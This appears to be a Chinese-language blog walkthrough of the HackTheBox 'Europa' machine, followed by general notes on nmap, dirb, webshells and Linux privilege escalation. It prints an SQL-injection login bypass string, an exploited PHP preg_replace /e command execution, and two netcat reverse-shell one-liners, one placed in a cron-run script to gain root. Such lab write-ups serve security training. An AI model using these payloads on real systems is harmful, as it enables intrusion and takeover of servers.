0x00 前言
0x01 信息收集
这里访问之后看到默认页面,按照htb,就是要绑域名,vul就扫目录
0x02 Web——Webshell
访问admin-portal.europacorp.htb
这里搜了一下没啥漏洞,一般这种都是万能密码进去
admin@europacorp.htb' or '1'='1
进入后台
这里看到一个vpn设置,涉及到一个php的preg_replace的漏洞,就是说正则表达式包含/e的时候就可以进行命令执行
反弹shell,注意编码,我这里直接弹/bin/bash就不需要去获取pty
rm+/tmp/f%3b+mkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc++10.10.14.6+1234+>/tmp/f
0x03 Webshell——Rootshell
这里用探测脚本可以看到有计划任务
看一看这个文件
接着跟踪到/var/www/cmd/logcleared.sh
发现不存在,那我们自己构造
echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 4321 >/tmp/f" >logcleared.sh
chmod 777 logcleared.sh
过一会儿就会拿到一个shell
补充知识
nmap
Nmap是一款自由、开源的网络安全扫描器。它能够发现网络上的主机和服务,以及它们的漏洞。Nmap是一个命令行工具,可以在Linux、Windows和Mac OS X等多个操作系统平台上运行。
Nmap提供了多种扫描技术,包括TCP SYN扫描、UDP扫描、TCP connect扫描等。它还可以通过识别网络中的操作系统和应用程序版本号,提高扫描准确度。同时Nmap还可以进行脚本扫描,这样可以检测出网络中存在的一些未知漏洞。
总的来说,Nmap是一款非常强大的网络安全扫描器,但在使用时需要谨慎,以免对网络造成不必要的影响。
dirb
dirb是一款常用的目录扫描工具,它可以通过暴力枚举的方式来查找Web服务器上的目录和文件,从而寻找潜在的安全漏洞。
使用dirb工具,可以帮助安全测试人员快速发现目标服务器上的隐藏目录,甚至可以通过扫描常用的文件后缀名来找到敏感文件。除此之外,dirb还可以支持自定义扫描字典,以及设置一些扫描参数等功能。
需要注意的是,使用dirb等目录扫描工具,需要遵循相关法律法规,避免对未授权目标进行扫描,产生不良后果。
webshell
WebShell是一种可以在Web服务器上执行命令的脚本或程序,通常由黑客在攻击中使用,以获取服务器的控制权。WebShell通常由某些漏洞或弱密码而获得入侵权限,它可以让黑客在服务器上执行各种操作,包括修改、删除、上传、下载等操作,这给服务器安全带来了极大的威胁。
WebShell的特点是易于使用和易于传播,且不需要管理员的直接参与,因此很难防止。为了防范WebShell的攻击,服务器管理员应该定期对服务器进行安全检查和漏洞修复,加强密码管理和访问控制,同时使用安全软件和防病毒软件来保护服务器的安全。
提权
Linux提权是指在Linux系统上,以普通用户权限登录系统后,通过一定的手段和技巧,获得系统管理员权限的过程。一旦获得了管理员权限,攻击者可以执行任意命令和修改系统配置,对系统造成严重威胁。
常见的Linux提权方法有:
-
滥用setuid程序:攻击者通过查找系统中含有setuid位的程序,并向这些程序注入恶意代码,从而获得root权限。
-
滥用SUID/SGID文件:攻击者可以利用SUID/SGID特性,修改文件权限或者向文件中注入可执行代码,从而提升自己的权限。
-
内核漏洞利用:攻击者可以利用Linux内核中存在的漏洞,来获取root权限。
-
提权脚本利用:攻击者可以使用提权脚本,自动化地查找系统中的漏洞,从而提升自己的权限。
为了防止Linux提权攻击,管理员需要时刻关注系统中的安全漏洞,并及时更新系统补丁。此外,还需要限制普通用户的权限,避免他们可以轻易地获得root权限。同时,使用安全软件和工具,及时检测和防止各种攻击。
扫一扫
282
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
